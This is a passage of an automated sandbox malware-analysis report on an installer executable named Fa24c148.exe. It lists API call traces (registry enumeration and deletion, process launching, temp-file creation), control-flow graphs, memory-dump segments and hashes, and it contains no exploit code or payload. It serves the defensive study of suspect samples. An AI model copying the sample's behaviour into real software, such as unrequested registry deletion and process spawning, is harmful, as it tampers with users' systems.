                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                    • String ID: C:\Program Files (x86)\shaw
                                                                                                    • API String ID: 3751793516-209812835
                                                                                                    • Opcode ID: 53cec99a44b5501f79705a11811158959523dda88924113c706af1bde306e0ba
                                                                                                    • Instruction ID: f9b53a9290970587256920563605d3a8fa34613ebd87cabe797d0c7397107685
                                                                                                    • Opcode Fuzzy Hash: 53cec99a44b5501f79705a11811158959523dda88924113c706af1bde306e0ba
                                                                                                    • Instruction Fuzzy Hash: 9711C631904104EBCF206FA0DD449AE76B1EF14369F34493BF881B61E1D63D49419A5D

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 729 402b7a-402ba3 RegOpenKeyExW 730 402ba5-402bb0 729->730 731 402c0e-402c12 729->731 732 402bcb-402bdb RegEnumKeyW 730->732 733 402bb2-402bb5 732->733 734 402bdd-402bef RegCloseKey call 4060e1 732->734 735 402c02-402c05 RegCloseKey 733->735 736 402bb7-402bc9 call 402b7a 733->736 742 402bf1-402c00 734->742 743 402c15-402c1b 734->743 740 402c0b-402c0d 735->740 736->732 736->734 740->731 742->731 743->740 744 402c1d-402c2b RegDeleteKeyW 743->744 744->740 745 402c2d 744->745 745->731
                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B9B
                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1912718029-0
                                                                                                    • Opcode ID: 90468eb9bf3c1f3e00f044c7195eeae7ded6c1ef4985fc59ea46c38fcee507d8
                                                                                                    • Instruction ID: 24cb19e20ea0269922d23406ceb1d71d2baff7de250534ea652b51db9971d4c8
                                                                                                    • Opcode Fuzzy Hash: 90468eb9bf3c1f3e00f044c7195eeae7ded6c1ef4985fc59ea46c38fcee507d8
                                                                                                    • Instruction Fuzzy Hash: 2B113A71904008FEEF219F90DE89EAE3B79EB54348F104476FA05B10A0D3B59E51EA69

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 747 10001771-100017ad call 10001b3e 751 100017b3-100017b7 747->751 752 100018be-100018c0 747->752 753 100017c0-100017cd call 100022eb 751->753 754 100017b9-100017bf call 100022a1 751->754 759 100017fd-10001804 753->759 760 100017cf-100017d4 753->760 754->753 761 10001824-10001828 759->761 762 10001806-10001822 call 1000248d call 100015cc call 10001280 GlobalFree 759->762 763 100017d6-100017d7 760->763 764 100017ef-100017f2 760->764 769 10001866-1000186c call 1000248d 761->769 770 1000182a-10001864 call 100015cc call 1000248d 761->770 787 1000186d-10001871 762->787 767 100017d9-100017da 763->767 768 100017df-100017e0 call 10002868 763->768 764->759 765 100017f4-100017f5 call 10002b23 764->765 779 100017fa 765->779 775 100017e7-100017ed call 1000260b 767->775 776 100017dc-100017dd 767->776 782 100017e5 768->782 769->787 770->787 786 100017fc 775->786 776->759 776->768 779->786 782->779 786->759 790 10001873-10001881 call 10002450 787->790 791 100018ae-100018b5 787->791 797 10001883-10001886 790->797 798 10001899-100018a0 790->798 791->752 793 100018b7-100018b8 GlobalFree 791->793 793->752 797->798 799 10001888-10001890 797->799 798->791 800 100018a2-100018ad call 10001555 798->800 799->798 802 10001892-10001893 FreeLibrary 799->802 800->791 802->798
                                                                                                    APIs
                                                                                                      • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DA9
                                                                                                      • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DAE
                                                                                                      • Part of subcall function 10001B3E: GlobalFree.KERNEL32(?), ref: 10001DB3
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 1000181C
                                                                                                    • FreeLibrary.KERNEL32(?), ref: 10001893
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 100018B8
                                                                                                      • Part of subcall function 100022A1: GlobalAlloc.KERNEL32(00000040,405EA210), ref: 100022D3
                                                                                                      • Part of subcall function 1000260B: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017ED,00000000), ref: 1000267D
                                                                                                      • Part of subcall function 100015CC: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001749,00000000), ref: 100015E5
                                                                                                      • Part of subcall function 1000248D: wsprintfW.USER32 ref: 100024E1
                                                                                                      • Part of subcall function 1000248D: GlobalFree.KERNEL32(?), ref: 10002559
                                                                                                      • Part of subcall function 1000248D: GlobalFree.KERNEL32(00000000), ref: 10002582
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2032781626.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2032762594.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2032798460.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2032821608.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_10000000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 1767494692-3916222277
                                                                                                    • Opcode ID: 7233f16ba86abf9f30ab0ca362f30c0571f5e64aff198df6ce991b39b1ebc49f
                                                                                                    • Instruction ID: b3d4579510dcbc356f87b8c5eb81e8e4ebd4f83f88234b59d07570181d0aa013
                                                                                                    • Opcode Fuzzy Hash: 7233f16ba86abf9f30ab0ca362f30c0571f5e64aff198df6ce991b39b1ebc49f
                                                                                                    • Instruction Fuzzy Hash: 7831BF799043459AFB10DF74DCC5BDA37E8EB043D4F058529F90AAA08EDF74A985C760

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 804 401bca-401be2 call 402b1d * 2 809 401be4-401beb call 402b3a 804->809 810 401bee-401bf2 804->810 809->810 812 401bf4-401bfb call 402b3a 810->812 813 401bfe-401c04 810->813 812->813 816 401c06-401c1a call 402b1d * 2 813->816 817 401c4a-401c74 call 402b3a * 2 FindWindowExW 813->817 827 401c3a-401c48 SendMessageW 816->827 828 401c1c-401c38 SendMessageTimeoutW 816->828 829 401c7a 817->829 827->829 830 401c7d-401c80 828->830 829->830 831 401c86 830->831 832 4029c7-4029d6 830->832 831->832
                                                                                                    APIs
                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Timeout
                                                                                                    • String ID: !
                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                    • Opcode ID: 9509e5e7a0907e764604f6084ff3dd6a46145b46d1e6bef9a99a17c67a449adc
                                                                                                    • Instruction ID: 32ea72146a28600a98e99adc179119cd295c2a32732311222b232d5c22eb20b7
                                                                                                    • Opcode Fuzzy Hash: 9509e5e7a0907e764604f6084ff3dd6a46145b46d1e6bef9a99a17c67a449adc
                                                                                                    • Instruction Fuzzy Hash: 8B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00405EB7,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405C6E
                                                                                                    • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00405EB7,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405C8F
                                                                                                    • RegCloseKey.ADVAPI32(?,?,00405EB7,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405CB2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                    • String ID: Call
                                                                                                    • API String ID: 3677997916-1824292864
                                                                                                    • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                                                    • Instruction ID: 3cd74c106f1fbed165a62e297fbc125935b5083a19d10d34083766567549a8a9
                                                                                                    • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                                                    • Instruction Fuzzy Hash: 4901083115420AEBEB218F66ED09E9B3FA8EF85354F00402AF915E6260D335D964DBA5
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 00405A30
                                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004031FD,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405A4B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CountFileNameTempTick
                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                    • API String ID: 1716503409-678247507
                                                                                                    • Opcode ID: 7292a228a83fa3ff922d64c5f727ba47b2c13c899f9c2b13fefe68a2db1948d4
                                                                                                    • Instruction ID: 95f7d282eddd658cc867a71ae78a7f6d6a22d0bd0d4c40af2882d7f7832b811b
                                                                                                    • Opcode Fuzzy Hash: 7292a228a83fa3ff922d64c5f727ba47b2c13c899f9c2b13fefe68a2db1948d4
                                                                                                    • Instruction Fuzzy Hash: 68F03676700204BBDB009F55DD45F9F77A8EBD5710F10813AE905F7190E6B0AE548B64
                                                                                                    APIs
                                                                                                      • Part of subcall function 00405021: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll,00000000,0040FE48,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000,?), ref: 00405059
                                                                                                      • Part of subcall function 00405021: lstrlenW.KERNEL32(004030DB,Skipped: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll,00000000,0040FE48,00000000,?,?,?,?,?,?,?,?,?,004030DB,00000000), ref: 00405069
                                                                                                      • Part of subcall function 00405021: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll,004030DB,004030DB,Skipped: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll,00000000,0040FE48,00000000), ref: 0040507C
                                                                                                      • Part of subcall function 00405021: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll), ref: 0040508E
                                                                                                      • Part of subcall function 00405021: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004050B4
                                                                                                      • Part of subcall function 00405021: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050CE
                                                                                                      • Part of subcall function 00405021: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050DC
                                                                                                      • Part of subcall function 004054F2: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256A0,Error launching installer), ref: 00405517
                                                                                                      • Part of subcall function 004054F2: CloseHandle.KERNEL32(?), ref: 00405524
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                    • String ID:
                                                                                                    • API String ID: 3585118688-0
                                                                                                    • Opcode ID: 8e7fac8ae1f025a0d1602a8f0f4718163d1cda1f3a438d2d2952dbcc5513a653
                                                                                                    • Instruction ID: bec0dc1b772bef8e3dfa3c1b84bb43adcf6872ff1fa5701b8d2c68c635bc108f
                                                                                                    • Opcode Fuzzy Hash: 8e7fac8ae1f025a0d1602a8f0f4718163d1cda1f3a438d2d2952dbcc5513a653
                                                                                                    • Instruction Fuzzy Hash: 2811A131D04204EBDF109FA0CD859DE7AB5EB04319F204437F501BA1E1C3798982DB9A
                                                                                                    APIs
                                                                                                      • Part of subcall function 00405D77: lstrcpynW.KERNEL32(?,?,00000400,0040326D,004281A0,NSIS Error), ref: 00405D84
                                                                                                      • Part of subcall function 0040586D: CharNextW.USER32(?,?,C:\,?,004058E1,C:\,C:\,?,?,74DF3420,0040561F,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Fa24c148.exe"), ref: 0040587B
                                                                                                      • Part of subcall function 0040586D: CharNextW.USER32(00000000), ref: 00405880
                                                                                                      • Part of subcall function 0040586D: CharNextW.USER32(00000000), ref: 00405898
                                                                                                    • lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,?,?,74DF3420,0040561F,?,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Fa24c148.exe"), ref: 00405923
                                                                                                    • GetFileAttributesW.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,74DF3420,0040561F,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 00405933
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
